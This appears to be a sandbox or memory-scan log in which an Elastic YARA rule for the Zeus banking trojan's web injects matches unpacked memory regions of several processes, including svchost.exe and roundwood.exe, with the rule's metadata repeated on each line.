Source: 0.2.roundwood.exe.407000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.dd2000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2d00000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.28c2000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2970000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3c20000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.24.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2950000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2c90000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.roundwood.exe.6ba318.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.40.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88e000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 12.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.14b0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 4.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.12e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.35.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 12.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1412000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.32.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.902000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.893000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.37.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2950000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 4.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1242000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.902000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.33.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2412000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.893000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2d00000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.16.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.c52000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.28.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2da0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
